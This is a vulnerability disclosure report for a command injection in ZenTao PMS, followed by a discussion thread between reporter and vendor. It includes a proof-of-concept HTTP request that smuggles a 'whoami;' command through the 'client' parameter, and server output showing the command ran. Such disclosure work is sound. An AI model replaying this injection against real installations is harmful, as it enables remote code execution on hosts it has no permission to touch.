Command Injection in easysoft/zentaopms
Reported on
Feb 7th 2022
Description
Zentaopms is affected by multiple command injection vulnerabilities. The function checkConnection() within /module/repo/model.php concatenate the POST parameter client to a command string which is executed via the exec() function.
Proof of Concept (git)
1 - Config zentao tu user git
$config->git->client = '/usr/bin/git';
$config->git->repos['pms']['path'] = '/home/user/testgit';
$config->git->repos['pms']['encoding'] = 'utf-8';
2 - As admin user use DevOps --> Repo --> Create select git
3 - Insert whoami; as Client Path.
4 - Click Save. The command output will be displayed in the error message
Connection to the repo failed. Please enter username, password and repo address correctly!
The command is: whoami; tag 2>&1 The error is(127): www-data
sh: 1: tag: not found
REQUEST
POST /zentaopms/www/index.php?m=repo&f=create&objectID=0 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 158
Origin: http://127.0.0.1
Connection: close
Cookie: lang=en; device=desktop; theme=default; tab=devops; zentaosid=vcu28jav9160khhetnp4fjposu; keepLogin=on; za=admin; zp=
product%5B%5D=1&SCM=Git&name=test&path=%2Fhome%2Fuser%2Ftestgit&encoding=utf-8&client=whoami;&account=&password=&encrypt=base64&desc=adfadaf&uid=62018e572ba38
NOTE: the uid parameter is not required for the request to work.
RESPONSE
HTTP/1.1 200 OK
Date: Mon, 07 Feb 2022 22:17:53 GMT
Server: Apache/2.4.51 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: lang=en; expires=Wed, 09-Mar-2022 22:17:53 GMT; Max-Age=2592000; path=/zentaopms/www/
Set-Cookie: device=desktop; expires=Wed, 09-Mar-2022 22:17:53 GMT; Max-Age=2592000; path=/zentaopms/www/; HttpOnly
Set-Cookie: theme=default; expires=Wed, 09-Mar-2022 22:17:53 GMT; Max-Age=2592000; path=/zentaopms/www/
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=3600; includeSubDomains
Referrer-Policy: no-referrer-when-downgrade
X-Permitted-Cross-Domain-Policies: master-only
X-Download-Options: noopen
Content-Security-Policy: form-action 'self';connect-src 'self';
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Content-Length: 229
Connection: close
Content-Type: text/html; Language=UTF-8;charset=UTF-8
{"result":"fail","message":{"submit":"Connection to the repo failed. Please enter username, password and repo address correctly!<br \/>The command is: whoami; tag 2>&1\nThe error is(127): www-data<br \/>sh: 1: tag: not found\n"}}
Impact
This vulnerability is capable of executing arbitrary code remotely on the host.
This is the adminitrator feature. We think if the user has the priviledge to add git repo to zentao, he should know what he's doing.
And also we can't check the command of git is good or evil since the git binarys are different for diffrent vesions.
The output of the command can help us to support the user. If no log output we don't what happends.
This is our adminitrator feature.
We need exec the git command to gain the webview of git repo. Since that we cann't keep the 100% safe of the git command since it can be a shell wrapper of the raw git bianry and can do anything in the shell wrapper. So can you help us how to keep it safe with the featrue keeped.
Thanks a lot.
I would like to point out that the same vulnerability (command execution as the admin user) has been validated on Zentao as reported below. Also an admin user shouldn't be able to execute arbitrary code on the remote machine.
https://nvd.nist.gov/vuln/detail/CVE-2021-27556
Since the binary path is already defined in the config->git->client variable within the config.php file you should use that value.
Then you don't need to concatenate the value of the POST parameter client which, ad reported above, can lead to remote arbitrary code execution.
Not everyone can set the client by the config file so we need support the web setting feature for the common user.
The cron module also is our feature. We can't give up eating for fearing of choking.
From what I understood, the integration of ZenTao with git still require modifications of the file system on the machine where ZenTao is installed.
Also the documentation states as follow:
Deploy GIT client on the machine installed ZenTao GIT client refers to command lines built in Git. It is git.exe in Windows and git in Linux. Currently, ZenTao can only integrate Git repos store *on the same machine which installs ZenTao *
. If it is a remote repo that you want to use, you have to clone that repo and update it regularly.
I would like to highlight that to use the repo module, writing on the file system of the machine where ZenTao is installed is required, otherwise this error will be generated
For security reasons, the client version needs to be detected. Please write the version to the file /var/www/html/zentaopms/tmp/log/version_62041acfe1d05.log. Execute command: /usr/bin/git --version > /var/www/html/zentaopms/tmp/log/version_62041acfe1d05.log
Since this scenario require write access in the directory where ZenTao resides, the path of the git binary could be hardcoded in a variable, for example :
$client = /usr/bin/git
Then the affected lines execution will be safe.
$command = "$client tag 2>&1"; exec($command, $output, $result);
Documentation: https://www.zentao.pm/book/zentaopromanual/free-open-source-project-management-software-svn-git-repo-140.html
Client: the path of a client. In Linux, it might be / usr /bin/svn (for Git , it might be / usr /bin/git). In Windows, you can download sliksvn which have been integrated into the one-click installation package( for Git, use msysGit), and then specify the path of svn.exe. *(Tips 1. The client has to be installed on the same server that installed ZenTao; * 2. The path of the SVN should not have spaces; 3. If using HTTPS, make sure that it is valid and the IP address should not be right after it.)
Thank you for your deep study of ZenTao. I confirmed with our guy that we've added the checking step to make sure that the current user have the operation with the system. Thus what's the version you're testing? Thank you.
And how to mark it to valid again?
Hi, glad to hear that I tested it on version 16.0.
About marking it valid again, we should ask to an admin. @admin
@wwccss @midist0xf - thank you for your patience, and apologies for the slow time to respond from my side.
I have re-opened the report so that it can be marked as valid. Let me know if either of you has any further questions! π π
@wwccss could you update the state of the vulnerability? thanks.
@wwccss Is it ok for you if huntr.dev starts the process for requesting a CVE for this report? thanks